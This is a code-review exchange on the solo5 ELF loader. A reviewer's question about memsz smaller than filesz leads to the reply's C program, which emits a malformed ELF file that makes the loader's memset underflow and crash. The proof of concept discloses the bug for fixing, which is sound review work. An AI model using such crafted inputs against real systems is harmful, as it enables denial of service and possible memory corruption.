tenders/common/elf.c

```diff
@@ -193,10 +179,10 @@ void elf_load(const char *file, uint8_t *mem, size_t mem_size,
             *p_end = _end;
 
         daddr = mem + paddr;
-        numb = pread_in_full(fd_kernel, daddr, filesz, offset);
-        if (numb < 0)
+        nbytes = pread_in_full(fd_kernel, daddr, filesz, offset);
+        if (nbytes < 0)
             goto out_error;
-        if (numb != filesz)
+        if (nbytes != filesz)
             goto out_invalid;
         memset(daddr + filesz, 0, memsz - filesz);
```

Comment:
Hmm, what happens if `memsz < filesz` here? Is that guaranteed not to occur?

Reply:
Sorry, I was getting a bit confused by the `add_overflow` checks.
Indeed this results in a call to `memset()` with a very large second argument (which results in a segfault):
```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <elf.h>
#include <string.h>
#include "../include/solo5/mft_abi.h"
int
main(){
  Elf64_Ehdr hdr;

  /* make ehdr_is_valid happy: */
  hdr.e_ident[EI_MAG0] = ELFMAG0;
  hdr.e_ident[EI_MAG1] = ELFMAG1;
  hdr.e_ident[EI_MAG2] = ELFMAG2;
  hdr.e_ident[EI_MAG3] = ELFMAG3;
  hdr.e_ident[EI_CLASS] = ELFCLASS64;
  hdr.e_type = ET_EXEC;
  hdr.e_machine = EM_X86_64;

  /* set ph params */
  hdr.e_phoff = sizeof(Elf64_Ehdr);
  hdr.e_phentsize = sizeof (Elf64_Phdr);
  hdr.e_phnum = 0x2;

  for(size_t i = 0; i < sizeof(Elf64_Ehdr); i++){
    printf("%c", ((char *)&hdr)[i]);
  }

  /////////////////// solo5 manifest  
  Elf64_Phdr phdr = {0};

  phdr.p_type = PT_NOTE; // satisfy check in loop

  phdr.p_paddr = 0;
  phdr.p_align = 0;
  phdr.p_offset = sizeof(Elf64_Ehdr) + 2*sizeof(Elf64_Phdr);
  // ^-- at the end of this file

  phdr.p_filesz = sizeof(struct mft_note);
  struct mft_note nhdr = {0};
  memcpy(&nhdr.h.name, SOLO5_NOTE_NAME, sizeof(SOLO5_NOTE_NAME));
  nhdr.h.type = SOLO5_NOTE_MANIFEST;
  nhdr.h.descsz = 0;
  nhdr.m.version = MFT_VERSION;
  nhdr.m.entries = 0;

  for(size_t i = 0; i < sizeof(Elf64_Phdr); i++){
    printf("%c", ((char *)&phdr)[i]);
  }

  /////////////////// memsz < filesz 
  memset(&phdr, 0, sizeof(phdr));

  phdr.p_type = PT_LOAD; // satisfy check in loop
  phdr.p_addr = 0x100000;
  phdr.p_memsz = 0;
  phdr.p_filesz = sizeof(Elf64_Ehdr) + sizeof(Elf64_Phdr);
  // memsz < filesz, to underflow in the memset


  for(size_t i = 0; i < sizeof(Elf64_Phdr); i++){
    printf("%c", ((char *)&phdr)[i]);
  }

  for(size_t i = 0; i < sizeof(struct mft_note); i++){
    printf("%c", ((char *)&nhdr)[i]);
  }

};
```